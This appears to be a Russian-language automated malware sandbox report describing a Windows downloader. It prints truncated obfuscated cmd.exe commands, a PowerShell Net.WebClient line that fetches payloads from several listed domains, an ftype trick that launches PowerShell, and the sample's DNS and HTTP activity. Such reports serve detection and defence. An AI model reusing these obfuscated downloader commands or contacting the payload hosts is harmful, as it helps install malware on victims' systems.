Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set RIZ=itwDUpZcmdTdtVWbvrdk-G.LC}BJFyj,90f=8Roxazs:IO+Pq)6e@A3\g '4l(\$E;h{QSMYuHXnN1&&for %A in (63;44;28;45;35;58;74;53;26;58;65;63;0;6;47;35;75;...
Сетевая активность
Подключается к
- 'am#######anochetemplaria.com':80
- 'am#######anochetemplaria.com':443
- 'fi###new.com':80
- 'fi###new.com':443
TCP
Запросы HTTP GET
- http://am#######anochetemplaria.com/UGoo19ojm
- http://fi###new.com/8JguPaaj
Другие
- 'am#######anochetemplaria.com':443
- 'fi###new.com':443
UDP
- DNS ASK am#######anochetemplaria.com
- DNS ASK sm#####akarta.sch.id
- DNS ASK cv###sbazi.ru
- DNS ASK fi###new.com
- DNS ASK po#.##digitize.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set RIZ=itwDUpZcmdTdtVWbvrdk-G.LC}BJFyj,90f=8Roxazs:IO+Pq)6e@A3\g '4l(\$E;h{QSMYuHXnN1&&for %A in (63;44;28;45;35;58;74;53;26;58;65;63;0;6;47;35;75;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set RIZ=itwDUpZcmdTdtVWbvrdk-G.LC}BJFyj,90f=8Roxazs:IO+Pq)6e@A3/g '4l(\$E;h{QSMYuHXnN1&&for %A in (63;44;28;45;35;58;74;53;26;58;65;63;0;6;47;35;75;51;2;20;38;15;30;51;7;12;57;76;51;12;22;...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $IFO='XAB';$iZP=new-object Net.WebClient;$PRU='http://am#######anochetemplaria.com/UGoo19ojm@http://smkn41jakarta.sch.id/YjjvJDX@http://cvetisbazi.ru/334qi3Mu@http://filmenew.com...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=jCIa. tokens=2" %C IN ('ftype^|find "Cons"') DO %C -"
- '<SYSTEM32>\cmd.exe' /c ftype|find "Cons"
- '<SYSTEM32>\find.exe' "Cons"
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
